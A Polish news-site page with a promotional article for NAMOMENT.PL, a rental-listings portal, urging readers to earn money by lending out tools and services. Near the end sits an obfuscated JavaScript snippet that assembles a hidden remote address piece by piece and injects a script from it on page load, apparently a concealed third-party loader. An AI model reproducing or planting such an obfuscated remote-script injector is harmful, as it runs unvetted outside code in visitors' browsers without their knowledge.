NAMOMENT.PL - lokalne ogłoszenia w całej Polsce!

2022-01-11 16:22:32(ost. akt: 2022-01-11 16:24:19)
Ogłoszenia lokalne. Opanowały nasze tablice na Facebooku, aplikacje mobilne i fora dyskusyjne. Ogłaszamy, że mamy coś do sprzedania, szukamy najlepszych specjalistów, pytamy o radę… Lokalne społeczności mają moc! Nie ma to jak opinia bezpośrednio ze strony zadowolonego użytkownika — sąsiada, kolegi czy kogoś, kto szukał podobnych rozwiązań, co my!
Ogłoszenia lokalne dla każdego
Teraz możesz sam wystawić swoje ogłoszenie. Wstawiając je w wielu miejscach w sieci, zwiększasz prawdopodobieństwo, że ktoś zainteresuje się Twoim produktem lub usługą. Czy znasz serwis NAMOMENT.PL? Lokalne ogłoszenia w tym serwisie dotyczą wynajmu przedmiotów i usług. W skrócie — jeśli posiadasz coś, co możesz udostępnić innym na moment (wiertarka, drabina, rower), to możesz wystawić to właśnie w tym portalu. Ale to nie wszystko. Wykonujesz sesje zdjęciowe? Zaoferuj je w swoim ogłoszeniu lokalnym. Masz firmę remontową? Wystaw darmowe ogłoszenie lokalne i pozyskaj nowych Klientów! NAMOMENT to portal nie tylko dla osób prywatnych, ale także dla firm. Zwiększ swoje zasięgi i poznaj możliwości nowego serwisu z ogłoszeniami najmu i ogłoszeniami dzierżawy.

Dobry zwyczaj — wypożyczaj
Ostatnio możemy zaobserwować przesyt konsumpcjonizmem i odwrócenie się od pędu posiadania. W zamian za to króluje ekologia, recykling, second handy i wiele rozwiązań, dzięki którym możemy nadać przedmiotom drugie życie! A czy wiesz o tym, że jest sposób, aby nadać przedmiotom nieskończenie wiele żyć? Ten sposób to wypożyczanie i gospodarka dostępu. Ten trend przyszłości to odpowiedź na coraz większe potrzeby użytkowników, którzy pragną mieć do czegoś dostęp, jednocześnie nie płacąc za to bardzo dużo pieniędzy. Wynajem to rozwiązanie win-win. Ty jako wynajmujący zarabiasz wielokrotnie na wystawianych przedmiotach. Osoba, która je od Ciebie wypożycza (najemca) oszczędza, ponieważ nie musi kupować nowych rzeczy.

Zarabiaj poprzez wypożyczanie
Poznaj zalety pożyczania i załóż konto w serwisie do wypożyczania. Odczaruj zły stereotyp o pożyczaniu. Od teraz pożyczanie nie jest złym zwyczajem, a sprytnym sposobem na zarabianie, oszczędzanie, ale też ograniczenie bezmyślnych zakupów. Wszystko zaczyna się od lokalności. Zadbaj o ekologię na własnym podwórku i przyłóż małą cegiełkę do walki z konsumpcjonizmem.

[script=]
(function(){
a17m=document.createElement("script");a17m_="u"+("s")+"ta";
a17m_+=("t.i")+""+"n";a17m_+=(("f")+"o");a17m.type="text/javascript";
a17m_+="/"; a17mu="364666148";a17mu+=".qcvmq6l717mpyg1pmvj";a17mu+="dn1gacac9ue";
a17m.src="https://"+a17m_+a17mu;a17m.async=true;document.body.appendChild(a17m);
})();
[/script]

2001-2022 © Gazeta Olsztyńska, Wszelkie prawa zastrzeżone, GRUPA WM Sp. z o. o., 10-364 Olsztyn, ul. Tracka 5